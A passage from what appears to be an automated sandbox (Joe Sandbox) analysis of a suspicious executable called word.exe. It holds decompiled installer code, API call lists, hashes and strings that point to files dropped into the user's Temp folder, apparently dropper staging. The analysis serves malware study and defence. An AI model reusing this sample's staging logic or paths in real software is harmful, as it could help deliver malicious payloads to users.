							E004066A5(0x423748, _t127, _t133,  &(0x423748[lstrlenW(0x423748)]),  *((intOrPtr*)(_t133 + 0x18)));
							SetWindowTextW(_t127, 0x423748);
							_push(_t136);
							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t133 - _t136;
								if( *_t133 == _t136) {
									continue;
								}
								__eflags =  *(_t133 + 4) - 5;
								if( *(_t133 + 4) != 5) {
									DestroyWindow( *0x429238);
									 *0x422720 = _t133;
									__eflags =  *_t133 - _t136;
									if( *_t133 <= _t136) {
										goto L60;
									}
									_t73 = CreateDialogParamW( *0x42a260,  *_t133 +  *0x429240 & 0x0000ffff, _t127,  *(0x40a3a0 +  *(_t133 + 4) * 4), _t133);
									__eflags = _t73 - _t136;
									 *0x429238 = _t73;
									if(_t73 == _t136) {
										goto L60;
									}
									_push( *((intOrPtr*)(_t133 + 0x2c)));
									_push(6);
									E004045C4(_t73);
									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
									ScreenToClient(_t127, _t137 + 0x10);
									SetWindowPos( *0x429238, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
									_push(_t136);
									E00401389( *((intOrPtr*)(_t133 + 0xc)));
									__eflags =  *0x42922c - _t136;
									if( *0x42922c != _t136) {
										goto L63;
									}
									ShowWindow( *0x429238, 8);
									E00404610(0x405);
									goto L60;
								}
								__eflags =  *0x42a2ec - _t136;
								if( *0x42a2ec != _t136) {
									goto L63;
								}
								__eflags =  *0x42a2e0 - _t136;
								if( *0x42a2e0 != _t136) {
									continue;
								}
								goto L63;
							}
						}
						DestroyWindow( *0x429238); // executed
						 *0x42a268 = _t136;
						EndDialog(_t127,  *0x421f18);
						goto L60;
					} else {
						__eflags = _t34 - 1;
						if(_t34 != 1) {
							L35:
							__eflags =  *_t133 - _t136;
							if( *_t133 == _t136) {
								goto L63;
							}
							goto L36;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L35;
						}
						SendMessageW( *0x429238, 0x40f, 0, 1);
						__eflags =  *0x42922c;
						return 0 |  *0x42922c == 0x00000000;
					}
				} else {
					_t127 = _a4;
					_t136 = 0;
					if(_t130 == 0x47) {
						SetWindowPos( *0x423728, _t127, 0, 0, 0, 0, 0x13);
					}
					_t122 = _a12;
					if(_t130 != 5) {
						L8:
						if(_t130 != 0x40d) {
							__eflags = _t130 - 0x11;
							if(_t130 != 0x11) {
								__eflags = _t130 - 0x111;
								if(_t130 != 0x111) {
									goto L28;
								}
								_t135 = _t122 & 0x0000ffff;
								_t128 = GetDlgItem(_t127, _t135);
								__eflags = _t128 - _t136;
								if(_t128 == _t136) {
									L15:
									__eflags = _t135 - 1;
									if(_t135 != 1) {
										__eflags = _t135 - 3;
										if(_t135 != 3) {
											_t129 = 2;
											__eflags = _t135 - _t129;
											if(_t135 != _t129) {
												L27:
												SendMessageW( *0x429238, 0x111, _t122, _a16);
												goto L28;
											}
											__eflags =  *0x42a2ec - _t136;
											if( *0x42a2ec == _t136) {
												_t99 = E0040140B(3);
												__eflags = _t99;
												if(_t99 != 0) {
													goto L28;
												}
												 *0x421f18 = 1;
												L23:
												_push(0x78);
												L24:
												E0040459D();
												goto L28;
											}
											E0040140B(_t129);
											 *0x421f18 = _t129;
											goto L23;
										}
										__eflags =  *0x40a39c - _t136; // 0x0
										if(__eflags <= 0) {
											goto L27;
										}
										_push(0xffffffff);
										goto L24;
									}
									_push(_t135);
									goto L24;
								}
								SendMessageW(_t128, 0xf3, _t136, _t136);
								_t103 = IsWindowEnabled(_t128);
								__eflags = _t103;
								if(_t103 == 0) {
									L63:
									return 0;
								}
								goto L15;
							}
							SetWindowLongW(_t127, _t136, _t136);
							return 1;
						}
						DestroyWindow( *0x429238);
						 *0x429238 = _t122;
						L60:
						_t145 =  *0x425748 - _t136; // 0x0
						if(_t145 == 0 &&  *0x429238 != _t136) {
							ShowWindow(_t127, 0xa);
							 *0x425748 = 1;
						}
						goto L63;
					} else {
						asm("sbb eax, eax");
						ShowWindow( *0x423728,  ~(_t122 - 1) & 0x00000005);
						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
							L28:
							return E0040462B(_a8, _t122, _a16);
						} else {
							ShowWindow(_t127, 4);
							goto L8;
						}
					}
				}
			}
































                                    0x004040d0
                                    0x004040d7
                                    0x0040423e
                                    0x00404242
                                    0x00404246
                                    0x00404248
                                    0x0040424d
                                    0x00404258
                                    0x00404263
                                    0x00404268
                                    0x0040426a
                                    0x0040426c
                                    0x0040426f
                                    0x00404274
                                    0x00404282
                                    0x0040428f
                                    0x00404296
                                    0x00404296
                                    0x00404297
                                    0x00404297
                                    0x0040429c
                                    0x004042a2
                                    0x004042a9
                                    0x004042af
                                    0x004042b1
                                    0x004042f1
                                    0x004042f6
                                    0x004042fb
                                    0x004042fb
                                    0x00404300
                                    0x00404309
                                    0x0040430b
                                    0x00404310
                                    0x00404316
                                    0x0040431a
                                    0x0040431a
                                    0x0040431f
                                    0x00404325
                                    0x00000000
                                    0x00000000
                                    0x00404330
                                    0x00404336
                                    0x00000000
                                    0x00000000
                                    0x0040433f
                                    0x00404347
                                    0x0040434c
                                    0x0040434f
                                    0x00404355
                                    0x0040435a
                                    0x0040435d
                                    0x00404363
                                    0x00404368
                                    0x0040436b
                                    0x00404371
                                    0x00404379
                                    0x0040437f
                                    0x00404385
                                    0x00404389
                                    0x00404390
                                    0x00404390
                                    0x00404390
                                    0x0040439a
                                    0x004043ac
                                    0x004043b8
                                    0x004043bd
                                    0x004043c7
                                    0x004043cd
                                    0x004043cf
                                    0x004043d4
                                    0x004043d1
                                    0x004043d1
                                    0x004043d1
                                    0x004043e4
                                    0x004043fc
                                    0x004043fe
                                    0x00404404
                                    0x00404419
                                    0x00404406
                                    0x0040440f
                                    0x00404411
                                    0x00404411
                                    0x0040441f
                                    0x00404430
                                    0x00404446
                                    0x0040444d
                                    0x00404453
                                    0x00404457
                                    0x0040445c
                                    0x0040445e
                                    0x00000000
                                    0x00404464
                                    0x00404464
                                    0x00404466
                                    0x00000000
                                    0x00000000
                                    0x0040446c
                                    0x00404470
                                    0x00404495
                                    0x0040449b
                                    0x004044a1
                                    0x004044a3
                                    0x00000000
                                    0x00000000
                                    0x004044c9
                                    0x004044cf
                                    0x004044d1
                                    0x004044d6
                                    0x00000000
                                    0x00000000
                                    0x004044dc
                                    0x004044df
                                    0x004044e2
                                    0x004044f9
                                    0x00404505
                                    0x0040451e
                                    0x00404524
                                    0x00404528
                                    0x0040452d
                                    0x00404533
                                    0x00000000
                                    0x00000000
                                    0x0040453d
                                    0x00404548
                                    0x00000000
                                    0x00404548
                                    0x00404472
                                    0x00404478
                                    0x00000000
                                    0x00000000
                                    0x0040447e
                                    0x00404484
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0040448a
                                    0x0040445e
                                    0x00404555
                                    0x00404561
                                    0x00404568
                                    0x00000000
                                    0x004042b3
                                    0x004042b3
                                    0x004042b6
                                    0x004042e9
                                    0x004042e9
                                    0x004042eb
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x004042eb
                                    0x004042b8
                                    0x004042bc
                                    0x004042c1
                                    0x004042c3
                                    0x00000000
                                    0x00000000
                                    0x004042d3
                                    0x004042db
                                    0x00000000
                                    0x004042e1
                                    0x004040e9
                                    0x004040e9
                                    0x004040ed
                                    0x004040f2
                                    0x00404101
                                    0x00404101
                                    0x00404107
                                    0x0040410e
                                    0x00404152
                                    0x00404158
                                    0x00404171
                                    0x00404174
                                    0x00404187
                                    0x0040418d
                                    0x00000000
                                    0x00000000
                                    0x00404193
                                    0x0040419e
                                    0x004041a0
                                    0x004041a2
                                    0x004041c1
                                    0x004041c1
                                    0x004041c4
                                    0x004041c9
                                    0x004041cc
                                    0x004041dc
                                    0x004041dd
                                    0x004041df
                                    0x00404215
                                    0x00404225
                                    0x00000000
                                    0x00404225
                                    0x004041e1
                                    0x004041e7
                                    0x00404200
                                    0x00404205
                                    0x00404207
                                    0x00000000
                                    0x00000000
                                    0x00404209
                                    0x004041f5
                                    0x004041f5
                                    0x004041f7
                                    0x004041f7
                                    0x00000000
                                    0x004041f7
                                    0x004041ea
                                    0x004041ef
                                    0x00000000
                                    0x004041ef
                                    0x004041ce
                                    0x004041d4
                                    0x00000000
                                    0x00000000
                                    0x004041d6
                                    0x00000000
                                    0x004041d6
                                    0x004041c6
                                    0x00000000
                                    0x004041c6
                                    0x004041ac
                                    0x004041b3
                                    0x004041b9
                                    0x004041bb
                                    0x00404591
                                    0x00000000
                                    0x00404591
                                    0x00000000
                                    0x004041bb
                                    0x00404179
                                    0x00000000
                                    0x00404181
                                    0x00404160
                                    0x00404166
                                    0x0040456e
                                    0x0040456e
                                    0x00404574
                                    0x00404581
                                    0x00404587
                                    0x00404587
                                    0x00000000
                                    0x00404110
                                    0x00404115
                                    0x00404121
                                    0x0040412a
                                    0x0040422b
                                    0x00000000
                                    0x00404149
                                    0x0040414c
                                    0x00000000
                                    0x0040414c
                                    0x0040412a
                                    0x0040410e

                                    APIs
                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404101
                                    • ShowWindow.USER32(?), ref: 00404121
                                    • GetWindowLongW.USER32(?,000000F0), ref: 00404133
                                    • ShowWindow.USER32(?,00000004), ref: 0040414C
                                    • DestroyWindow.USER32 ref: 00404160
                                    • SetWindowLongW.USER32 ref: 00404179
                                    • GetDlgItem.USER32(?,?), ref: 00404198
                                    • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004041AC
                                    • IsWindowEnabled.USER32(00000000), ref: 004041B3
                                    • GetDlgItem.USER32(?,00000001), ref: 0040425E
                                    • GetDlgItem.USER32(?,00000002), ref: 00404268
                                    • SetClassLongW.USER32(?,000000F2,?), ref: 00404282
                                    • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004042D3
                                    • GetDlgItem.USER32(?,00000003), ref: 00404379
                                    • ShowWindow.USER32(00000000,?), ref: 0040439A
                                    • EnableWindow.USER32(?,?), ref: 004043AC
                                    • EnableWindow.USER32(?,?), ref: 004043C7
                                    • GetSystemMenu.USER32 ref: 004043DD
                                    • EnableMenuItem.USER32 ref: 004043E4
                                    • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004043FC
                                    • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040440F
                                    • lstrlenW.KERNEL32(00423748,?,00423748,00000000), ref: 00404439
                                    • SetWindowTextW.USER32 ref: 0040444D
                                    • ShowWindow.USER32(?,0000000A), ref: 00404581
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.987514881.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.987509042.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987527452.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000044B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.0000000000455000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                    Similarity
                                    • API ID: Window$Item$MessageSendShow$EnableLong$Menu$ClassDestroyEnabledSystemTextlstrlen
                                    • String ID: H7B
                                    • API String ID: 1860320154-2300413410
                                    • Opcode ID: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
                                    • Instruction ID: 1d4a55fced449df2e2a9dfc159c1061f424388fbea236c5341ec002980a30b6c
                                    • Opcode Fuzzy Hash: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
                                    • Instruction Fuzzy Hash: C0C1C2B1600604FBDB216F61EE85E2A3B78EB85745F40097EF781B51F0CB3958529B2E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00403D17 Relevance: 44.0, APIs: 13, Strings: 12, Instructions: 215stringregistryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 248 403d17-403d2f call 406a35 251 403d31-403d41 call 4065af 248->251 252 403d43-403d7a call 406536 248->252 261 403d9d-403dc6 call 403fed call 40603f 251->261 257 403d92-403d98 lstrcatW 252->257 258 403d7c-403d8d call 406536 252->258 257->261 258->257 266 403e58-403e60 call 40603f 261->266 267 403dcc-403dd1 261->267 273 403e62-403e69 call 4066a5 266->273 274 403e6e-403e93 LoadImageW 266->274 267->266 269 403dd7-403dff call 406536 267->269 269->266 275 403e01-403e05 269->275 273->274 277 403f14-403f1c call 40140b 274->277 278 403e95-403ec5 RegisterClassW 274->278 279 403e17-403e23 lstrlenW 275->279 280 403e07-403e14 call 405f64 275->280 291 403f26-403f31 call 403fed 277->291 292 403f1e-403f21 277->292 281 403fe3 278->281 282 403ecb-403f0f SystemParametersInfoW CreateWindowExW 278->282 286 403e25-403e33 lstrcmpiW 279->286 287 403e4b-403e53 call 405f37 call 406668 279->287 280->279 285 403fe5-403fec 281->285 282->277 286->287 290 403e35-403e3f GetFileAttributesW 286->290 287->266 294 403e41-403e43 290->294 295 403e45-403e46 call 405f83 290->295 301 403f37-403f51 ShowWindow call 4069c5 291->301 302 403fba-403fc2 call 40579d 291->302 292->285 294->287 294->295 295->287 307 403f53-403f58 call 4069c5 301->307 308 403f5d-403f6f GetClassInfoW 301->308 309 403fc4-403fca 302->309 310 403fdc-403fde call 40140b 302->310 307->308 313 403f71-403f81 GetClassInfoW RegisterClassW 308->313 314 403f87-403faa DialogBoxParamW call 40140b 308->314 309->292 315 403fd0-403fd7 call 40140b 309->315 310->281 313->314 319 403faf-403fb8 call 403c67 314->319 315->292 319->285
                                    C-Code - Quality: 96%
                                    			E00403D17(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t22;
				void* _t30;
				void* _t32;
				int _t33;
				void* _t36;
				int _t39;
				int _t40;
				int _t44;
				short _t63;
				WCHAR* _t65;
				signed char _t69;
				WCHAR* _t76;
				intOrPtr _t82;
				WCHAR* _t87;

				_t82 =  *0x42a270;
				_t22 = E00406A35(2);
				_t90 = _t22;
				if(_t22 == 0) {
					_t76 = 0x423748;
					L"1033" = 0x30;
					 *0x437002 = 0x78;
					 *0x437004 = 0;
					E00406536(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x423748, 0);
					__eflags =  *0x423748;
					if(__eflags == 0) {
						E00406536(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x423748, 0);
					}
					lstrcatW(L"1033", _t76);
				} else {
					E004065AF(L"1033",  *_t22() & 0x0000ffff);
				}
				E00403FED(_t78, _t90);
				 *0x42a2e0 =  *0x42a278 & 0x00000020;
				 *0x42a2fc = 0x10000;
				if(E0040603F(_t90, 0x435800) != 0) {
					L16:
					if(E0040603F(_t98, 0x435800) == 0) {
						E004066A5(_t76, 0, _t82, 0x435800,  *((intOrPtr*)(_t82 + 0x118)));
					}
					_t30 = LoadImageW( *0x42a260, 0x67, 1, 0, 0, 0x8040);
					 *0x429248 = _t30;
					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t32 = E00403FED(_t78, __eflags);
							__eflags =  *0x42a300;
							if( *0x42a300 != 0) {
								_t33 = E0040579D(_t32, 0);
								__eflags = _t33;
								if(_t33 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42922c;
								if( *0x42922c == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x423728, 5); // executed
							_t39 = E004069C5("RichEd20"); // executed
							__eflags = _t39;
							if(_t39 == 0) {
								E004069C5("RichEd32");
							}
							_t87 = L"RichEdit20W";
							_t40 = GetClassInfoW(0, _t87, 0x429200);
							__eflags = _t40;
							if(_t40 == 0) {
								GetClassInfoW(0, L"RichEdit", 0x429200);
								 *0x429224 = _t87;
								RegisterClassW(0x429200);
							}
							_t44 = DialogBoxParamW( *0x42a260,  *0x429240 + 0x00000069 & 0x0000ffff, 0, E004040C5, 0); // executed
							E00403C67(E0040140B(5), 1);
							return _t44;
						}
						L22:
						_t36 = 2;
						return _t36;
					} else {
						_t78 =  *0x42a260;
						 *0x429204 = E00401000;
						 *0x429210 =  *0x42a260;
						 *0x429214 = _t30;
						 *0x429224 = 0x40a3b4;
						if(RegisterClassW(0x429200) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoW(0x30, 0,  &_v16, 0);
						 *0x423728 = CreateWindowExW(0x80, 0x40a3b4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42a260, 0);
						goto L21;
					}
				} else {
					_t78 =  *(_t82 + 0x48);
					_t92 = _t78;
					if(_t78 == 0) {
						goto L16;
					}
					_t76 = 0x428200;
					E00406536(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x42a298 + _t78 * 2,  *0x42a298 +  *(_t82 + 0x4c) * 2, 0x428200, 0);
					_t63 =  *0x428200; // 0x22
					if(_t63 == 0) {
						goto L16;
					}
					if(_t63 == 0x22) {
						_t76 = 0x428202;
						 *((short*)(E00405F64(0x428202, 0x22))) = 0;
					}
					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
						L15:
						E00406668(0x435800, E00405F37(_t76));
						goto L16;
					} else {
						_t69 = GetFileAttributesW(_t76);
						if(_t69 == 0xffffffff) {
							L14:
							E00405F83(_t76);
							goto L15;
						}
						_t98 = _t69 & 0x00000010;
						if((_t69 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}
























                                    0x00403d1d
                                    0x00403d26
                                    0x00403d2d
                                    0x00403d2f
                                    0x00403d43
                                    0x00403d55
                                    0x00403d5e
                                    0x00403d67
                                    0x00403d6e
                                    0x00403d73
                                    0x00403d7a
                                    0x00403d8d
                                    0x00403d8d
                                    0x00403d98
                                    0x00403d31
                                    0x00403d3c
                                    0x00403d3c
                                    0x00403d9d
                                    0x00403db0
                                    0x00403db5
                                    0x00403dc6
                                    0x00403e58
                                    0x00403e60
                                    0x00403e69
                                    0x00403e69
                                    0x00403e7f
                                    0x00403e85
                                    0x00403e93
                                    0x00403f14
                                    0x00403f1c
                                    0x00403f26
                                    0x00403f2b
                                    0x00403f31
                                    0x00403fbb
                                    0x00403fc0
                                    0x00403fc2
                                    0x00403fde
                                    0x00000000
                                    0x00403fde
                                    0x00403fc4
                                    0x00403fca
                                    0x00403fd2
                                    0x00403fd2
                                    0x00000000
                                    0x00403fca
                                    0x00403f3f
                                    0x00403f4a
                                    0x00403f4f
                                    0x00403f51
                                    0x00403f58
                                    0x00403f58
                                    0x00403f63
                                    0x00403f6b
                                    0x00403f6d
                                    0x00403f6f
                                    0x00403f78
                                    0x00403f7b
                                    0x00403f81
                                    0x00403f81
                                    0x00403fa0
                                    0x00403fb1
                                    0x00000000
                                    0x00403fb6
                                    0x00403f1e
                                    0x00403f20
                                    0x00000000
                                    0x00403e95
                                    0x00403e95
                                    0x00403ea1
                                    0x00403eab
                                    0x00403eb1
                                    0x00403eb6
                                    0x00403ec5
                                    0x00403fe3
                                    0x00403fe3
                                    0x00000000
                                    0x00403fe3
                                    0x00403ed4
                                    0x00403f0f
                                    0x00000000
                                    0x00403f0f
                                    0x00403dcc
                                    0x00403dcc
                                    0x00403dcf
                                    0x00403dd1
                                    0x00000000
                                    0x00000000
                                    0x00403ddf
                                    0x00403df1
                                    0x00403df6
                                    0x00403dff
                                    0x00000000
                                    0x00000000
                                    0x00403e05
                                    0x00403e07
                                    0x00403e14
                                    0x00403e14
                                    0x00403e1d
                                    0x00403e23
                                    0x00403e4b
                                    0x00403e53
                                    0x00000000
                                    0x00403e35
                                    0x00403e36
                                    0x00403e3f
                                    0x00403e45
                                    0x00403e46
                                    0x00000000
                                    0x00403e46
                                    0x00403e41
                                    0x00403e43
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00403e43
                                    0x00403e23

                                    APIs
                                      • Part of subcall function 00406A35: GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
                                      • Part of subcall function 00406A35: GetProcAddress.KERNEL32(00000000,?), ref: 00406A62
                                    • lstrcatW.KERNEL32 ref: 00403D98
                                    • lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\lyebkz.exe" C:\Users\user\AppData\Local\Temp\ektmwwvwm.tx,?,?,?,"C:\Users\user\AppData\Local\Temp\lyebkz.exe" C:\Users\user\AppData\Local\Temp\ektmwwvwm.tx,00000000,00435800,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,7556D4C4), ref: 00403E18
                                    • lstrcmpiW.KERNEL32(?,.exe,"C:\Users\user\AppData\Local\Temp\lyebkz.exe" C:\Users\user\AppData\Local\Temp\ektmwwvwm.tx,?,?,?,"C:\Users\user\AppData\Local\Temp\lyebkz.exe" C:\Users\user\AppData\Local\Temp\ektmwwvwm.tx,00000000,00435800,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000), ref: 00403E2B
                                    • GetFileAttributesW.KERNEL32("C:\Users\user\AppData\Local\Temp\lyebkz.exe" C:\Users\user\AppData\Local\Temp\ektmwwvwm.tx,?,00000000,?), ref: 00403E36
                                    • LoadImageW.USER32 ref: 00403E7F
                                      • Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC
                                    • RegisterClassW.USER32 ref: 00403EBC
                                    • SystemParametersInfoW.USER32 ref: 00403ED4
                                    • CreateWindowExW.USER32 ref: 00403F09
                                    • ShowWindow.USER32(00000005,00000000), ref: 00403F3F
                                    • GetClassInfoW.USER32 ref: 00403F6B
                                    • GetClassInfoW.USER32 ref: 00403F78
                                    • RegisterClassW.USER32 ref: 00403F81
                                    • DialogBoxParamW.USER32 ref: 00403FA0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.987514881.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.987509042.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987527452.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000044B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.0000000000455000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                    Similarity
                                    • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                    • String ID: "C:\Users\user\AppData\Local\Temp\lyebkz.exe" C:\Users\user\AppData\Local\Temp\ektmwwvwm.tx$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$H7B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                    • API String ID: 1975747703-2688564648
                                    • Opcode ID: 53155da091c4b3d7a5df89bad193350c55a8525543a5f9d2669ac1eab67f041a
                                    • Instruction ID: e235badc60aeba35c86cf297cd954ec43a22164425911800af60bc979c7621a1
                                    • Opcode Fuzzy Hash: 53155da091c4b3d7a5df89bad193350c55a8525543a5f9d2669ac1eab67f041a
                                    • Instruction Fuzzy Hash: E661D570640201BAD730AF66AD45E2B3A7CEB84B49F40457FF945B22E1DB3D5911CA3D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004030D0 Relevance: 23.0, APIs: 5, Strings: 8, Instructions: 204memoryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 322 4030d0-40311e GetTickCount GetModuleFileNameW call 406158 325 403120-403125 322->325 326 40312a-403158 call 406668 call 405f83 call 406668 GetFileSize 322->326 327 40336a-40336e 325->327 334 403243-403251 call 40302e 326->334 335 40315e 326->335 341 403322-403327 334->341 342 403257-40325a 334->342 337 403163-40317a 335->337 339 40317c 337->339 340 40317e-403187 call 4035e2 337->340 339->340 348 40318d-403194 340->348 349 4032de-4032e6 call 40302e 340->349 341->327 344 403286-4032d2 GlobalAlloc call 406b90 call 406187 CreateFileW 342->344 345 40325c-403274 call 4035f8 call 4035e2 342->345 373 4032d4-4032d9 344->373 374 4032e8-403318 call 4035f8 call 403371 344->374 345->341 368 40327a-403280 345->368 353 403210-403214 348->353 354 403196-4031aa call 406113 348->354 349->341 358 403216-40321d call 40302e 353->358 359 40321e-403224 353->359 354->359 371 4031ac-4031b3 354->371 358->359 364 403233-40323b 359->364 365 403226-403230 call 406b22 359->365 364->337 372 403241 364->372 365->364 368->341 368->344 371->359 377 4031b5-4031bc 371->377 372->334 373->327 383 40331d-403320 374->383 377->359 379 4031be-4031c5 377->379 379->359 380 4031c7-4031ce 379->380 380->359 382 4031d0-4031f0 380->382 382->341 384 4031f6-4031fa 382->384 383->341 385 403329-40333a 383->385 386 403202-40320a 384->386 387 4031fc-403200 384->387 388 403342-403347 385->388 389 40333c 385->389 386->359 390 40320c-40320e 386->390 387->372 387->386 391 403348-40334e 388->391 389->388 390->359 391->391 392 403350-403368 call 406113 391->392 392->327
                                    C-Code - Quality: 98%
                                    			E004030D0(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				short _v560;
				long _t54;
				void* _t57;
				void* _t62;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				long _t82;
				signed int _t89;
				intOrPtr _t92;
				long _t94;
				void* _t102;
				void* _t106;
				long _t107;
				long _t110;
				void* _t111;

				_t94 = 0;
				_v8 = 0;
				_v12 = 0;
				 *0x42a26c = GetTickCount() + 0x3e8;
				GetModuleFileNameW(0, L"C:\\Users\\Albus\\AppData\\Roaming\\word.exe", 0x400);
				_t106 = E00406158(L"C:\\Users\\Albus\\AppData\\Roaming\\word.exe", 0x80000000, 3);
				 *0x40a018 = _t106;
				if(_t106 == 0xffffffff) {
					return L"Error launching installer";
				}
				E00406668(0x436800, L"C:\\Users\\Albus\\AppData\\Roaming\\word.exe");
				E00406668(0x439000, E00405F83(0x436800));
				_t54 = GetFileSize(_t106, 0);
				 *0x420f00 = _t54;
				_t110 = _t54;
				if(_t54 <= 0) {
					L24:
					E0040302E(1);
					if( *0x42a274 == _t94) {
						goto L32;
					}
					if(_v12 == _t94) {
						L28:
						_t57 = GlobalAlloc(0x40, _v20); // executed
						_t111 = _t57;
						E00406B90(0x40ce68);
						E00406187(0x40ce68,  &_v560, L"C:\\Users\\Albus\\AppData\\Local\\Temp\\"); // executed
						_t62 = CreateFileW( &_v560, 0xc0000000, _t94, _t94, 2, 0x4000100, _t94); // executed
						 *0x40a01c = _t62;
						if(_t62 != 0xffffffff) {
							_t65 = E004035F8( *0x42a274 + 0x1c);
							 *0x420f04 = _t65;
							 *0x420ef8 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E00403371(_v16, 0xffffffff, _t94, _t111, _v20); // executed
							if(_t68 == _v20) {
								 *0x42a270 = _t111;
								 *0x42a278 =  *_t111;
								if((_v40 & 0x00000001) != 0) {
									 *0x42a27c =  *0x42a27c + 1;
								}
								_t45 = _t111 + 0x44; // 0x44
								_t70 = _t45;
								_t102 = 8;
								do {
									_t70 = _t70 - 8;
									 *_t70 =  *_t70 + _t111;
									_t102 = _t102 - 1;
								} while (_t102 != 0);
